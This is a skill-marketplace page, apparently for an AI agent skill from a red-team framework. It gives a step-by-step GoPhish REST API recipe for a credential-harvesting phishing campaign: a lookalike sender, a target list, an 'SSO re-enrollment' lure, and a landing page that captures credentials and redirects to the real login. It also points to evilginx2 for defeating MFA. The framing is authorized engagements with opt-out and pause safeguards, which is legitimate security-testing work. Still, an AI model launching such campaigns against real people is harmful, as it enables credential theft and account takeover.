Jeden Skill in Manus ausführen
mit einem Klick

Jeden Skill in Manus mit einem Klick ausführen

gophish-campaign

Sterne4.445

Forks878

Aktualisiert8. Juni 2026 um 07:58

Build and launch a tracked phishing campaign with the GoPhish REST API — sending profile, groups, email template, landing page, launch, and event polling.

Installation

Mit Codex oder Claude installieren Kopieren Sie diesen Prompt, fügen Sie ihn in Codex, Claude oder einen anderen Assistant ein und lassen Sie die Skill-Seite prüfen und installieren.

In Manus ausführen

Quelle

PurpleAILAB

PurpleAILAB/Decepticon

GitHub-Repository öffnen Creator-Repositorys ansehen

Download

In Manus ausführen

Verwandte BerufeSOC

Basierend auf der SOC-Berufsklassifikation

InformationssicherheitsanalystenInformatik- und Mathematikberufe·SOC 15-1212

SKILL.md

readonly

name	gophish-campaign
description	Build and launch a tracked phishing campaign with the GoPhish REST API — sending profile, groups, email template, landing page, launch, and event polling.
metadata	{"subdomain":"phishing","when_to_use":"gophish, phishing campaign, email template, landing page, campaign tracking, credential harvest landing","mitre_attack":["T1566.002","T1598.003"],"tags":["phishing","gophish","campaign"]}

GoPhish Campaign

GoPhish drives the credential-harvest landing-page flow and the click/submit tracking the report needs. Use it for the "fake login page" path; use evilginx2-proxy instead when you must defeat MFA.

Prerequisites

GoPhish running in the sandbox (gophish binary; admin API on https://127.0.0.1:3333, phish server on :80/:443).
GOPHISH_API_KEY exported (read from the admin UI once).
The lure-deconfliction handshake COMPLETE for this campaign.
A sender domain with SPF/DKIM/DMARC (lookalike-domain) and a pretext (pretext-engineering).

Flow (REST API)

API=https://127.0.0.1:3333/api
H="Authorization: Bearer $GOPHISH_API_KEY"

# 1. Sending profile (SMTP)
curl -sk -H "$H" -H 'Content-Type: application/json' $API/smtp/ -d '{
  "name":"eng-smtp","host":"smtp.lure-domain.example:587",
  "from_address":"it-support@lure-domain.example",
  "username":"...","password":"...","ignore_cert_errors":true}'

# 2. Target group (from plan/phisher/pretext.md shortlist)
curl -sk -H "$H" -H 'Content-Type: application/json' $API/groups/ -d '{
  "name":"wave1","targets":[{"email":"alice@acme.example","first_name":"Alice","last_name":"R"}]}'

# 3. Email template (include the X-Decepticon-Eng header + opt-out URL)
curl -sk -H "$H" -H 'Content-Type: application/json' $API/templates/ -d '{
  "name":"sso-migration","subject":"Action needed: SSO re-enrollment",
  "html":"<a href=\"{{.URL}}\">Re-enroll</a> {{.Tracker}}"}'

# 4. Landing page (capture creds, then redirect to the real site)
curl -sk -H "$H" -H 'Content-Type: application/json' $API/pages/ -d '{
  "name":"sso-landing","html":"<form>...</form>",
  "capture_credentials":true,"redirect_url":"https://login.microsoftonline.com"}'

# 5. Launch
curl -sk -H "$H" -H 'Content-Type: application/json' $API/campaigns/ -d '{
  "name":"acme-wave1","template":{"name":"sso-migration"},
  "page":{"name":"sso-landing"},"smtp":{"name":"eng-smtp"},
  "url":"https://login.acme-portal.example","groups":[{"name":"wave1"}]}'

# 6. Poll results
curl -sk -H "$H" $API/campaigns/ | jq '.[].results[] | {email,status}'

Evidence

Each submitted credential → Credential node linked to the User node with an OBTAINED_VIA edge carrying the campaign id. Save the raw GoPhish results JSON under evidence/phisher/<campaign>.json.

OPSEC / failsafe

Send rate matches opsec_level (stealth ≤2/h, standard ≤20/h).
gophish_pause_campaign (PUT $API/campaigns/:id/complete) halts sending instantly on a SOC stop request.
Every template carries the engagement header + opt-out link.

Mehr aus diesem Repository

gleiches Repository

decepticon

PurpleAILAB/Decepticon

Drive Decepticon — an autonomous multi-agent red-team framework — over MCP to run authorized penetration tests and bug-bounty engagements end to end, then watch and steer them live from chat. Launch an engagement against a target, poll its transcript to narrate progress, send messages to refocus it, and pull findings as SARIF. Use when the user asks to run a pentest/red-team engagement, hunt a bug bounty, do recon, exploit/scan a host, web app, API, network, cloud, Active Directory, mobile app, or smart contract WITH Decepticon — or to check/resume a running engagement or report what Decepticon found. Triggers: run a decepticon engagement, pentest this with decepticon, bug bounty, recon this target, red team this, scan this host, resume the engagement, what did decepticon find, decepticon status. Do NOT use for ad-hoc local tool runs (running nmap/sqlmap/ffuf directly) when no Decepticon server is involved — this drives the Decepticon orchestrator, not raw tools.

2026-06-164.4k

iot-security

PurpleAILAB/Decepticon

IoT device security reconnaissance — firmware extraction, embedded analysis, protocol identification, default credential checking, vulnerability scanning, device fingerprinting.

2026-06-154.4k

mobile-security

PurpleAILAB/Decepticon

Mobile application security reconnaissance — APK/IPA analysis, permission enumeration, certificate validation, hardcoded secret detection, insecure storage identification, network security analysis.

2026-06-154.4k

wireless-security

PurpleAILAB/Decepticon

Wireless network security reconnaissance — WiFi analysis, Bluetooth assessment, RFID/NFC evaluation, signal capture, protocol analysis, encryption testing, rogue device detection.

2026-06-154.4k

finding-protocol

PurpleAILAB/Decepticon

Operational-tier finding template — minimal fields for sub-agent decision support. Heavyweight deliverable promotion lives in skills/decepticon/final-report.

2026-06-124.4k

engagement-lifecycle

PurpleAILAB/Decepticon

Red team engagement lifecycle management — initiation, phase transitions, go/no-go gates, deconfliction, emergency procedures, completion.

2026-06-124.4k

GoPhish Campaign

GoPhish drives the credential-harvest landing-page flow and the click/submit tracking the report needs. Use it for the "fake login page" path; use evilginx2-proxy instead when you must defeat MFA.

Prerequisites

GoPhish running in the sandbox (gophish binary; admin API on https://127.0.0.1:3333, phish server on :80/:443).

GOPHISH_API_KEY exported (read from the admin UI once).

The lure-deconfliction handshake COMPLETE for this campaign.

A sender domain with SPF/DKIM/DMARC (lookalike-domain) and a pretext (pretext-engineering).

Flow (REST API)

API=https://127.0.0.1:3333/api H="Authorization: Bearer $GOPHISH_API_KEY" # 1. Sending profile (SMTP) curl -sk -H "$H" -H 'Content-Type: application/json' $API/smtp/ -d '{ "name":"eng-smtp","host":"smtp.lure-domain.example:587", "from_address":"it-support@lure-domain.example", "username":"...","password":"...","ignore_cert_errors":true}' # 2. Target group (from plan/phisher/pretext.md shortlist) curl -sk -H "$H" -H 'Content-Type: application/json' $API/groups/ -d '{ "name":"wave1","targets":[{"email":"alice@acme.example","first_name":"Alice","last_name":"R"}]}' # 3. Email template (include the X-Decepticon-Eng header + opt-out URL) curl -sk -H "$H" -H 'Content-Type: application/json' $API/templates/ -d '{ "name":"sso-migration","subject":"Action needed: SSO re-enrollment", "html":"<a href=\"{{.URL}}\">Re-enroll</a> {{.Tracker}}"}' # 4. Landing page (capture creds, then redirect to the real site) curl -sk -H "$H" -H 'Content-Type: application/json' $API/pages/ -d '{ "name":"sso-landing","html":"<form>...</form>", "capture_credentials":true,"redirect_url":"https://login.microsoftonline.com"}' # 5. Launch curl -sk -H "$H" -H 'Content-Type: application/json' $API/campaigns/ -d '{ "name":"acme-wave1","template":{"name":"sso-migration"}, "page":{"name":"sso-landing"},"smtp":{"name":"eng-smtp"}, "url":"https://login.acme-portal.example","groups":[{"name":"wave1"}]}' # 6. Poll results curl -sk -H "$H" $API/campaigns/ | jq '.[].results[] | {email,status}'

Evidence

OPSEC / failsafe

Send rate matches opsec_level (stealth ≤2/h, standard ≤20/h).

gophish_pause_campaign (PUT $API/campaigns/:id/complete) halts sending instantly on a SOC stop request.

Every template carries the engagement header + opt-out link.